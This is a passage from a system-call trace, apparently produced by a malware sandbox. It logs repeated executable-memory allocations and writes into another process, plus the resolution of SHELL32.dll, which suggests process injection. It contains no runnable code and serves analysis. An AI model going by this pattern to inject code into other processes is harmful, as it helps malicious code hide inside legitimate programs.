RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.572] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.573] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.573] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.573] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.573] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.573] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.573] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.573] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.574] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.574] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a020, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.574] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.574] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a074*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a074*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0140.574] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.574] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.574] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.574] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.575] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.575] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.575] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.773] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.773] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.774] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.774] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.774] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.774] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a028, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.774] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.775] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a064*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a064*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.775] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.775] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.775] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.775] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.776] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.776] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.776] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.776] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.776] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.776] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.777] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.777] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.777] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a030, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.777] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.777] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a052*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a052*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.777] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.777] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.778] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.778] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.778] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.778] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.778] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.779] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.779] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.779] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.779] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.779] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.779] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a038, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.779] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.780] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a03a*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a03a*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0140.780] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.780] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.780] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.780] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.781] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.781] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.781] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.781] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.781] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.781] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.781] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.782] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.782] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a040, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.782] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.782] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94a024*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94a024*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0140.782] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.782] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.783] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.783] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.783] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.783] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.783] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.783] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.784] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.784] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.784] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.784] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.784] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a048, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.784] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.785] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949d2a*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949d2a*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0140.785] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.785] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.785] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.785] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.786] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.786] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.786] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.786] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.786] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.786] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.786] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.787] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.787] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a050, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.787] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.787] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ce8*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ce8*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.787] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.787] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.788] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.788] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.788] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.788] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.788] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.788] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.789] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.789] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.789] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.789] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.789] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a058, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.789] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949d5c, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="SHELL32.dll") returned 12 [0140.789] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.789] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x17) returned 0x0 [0140.790] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.790] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, 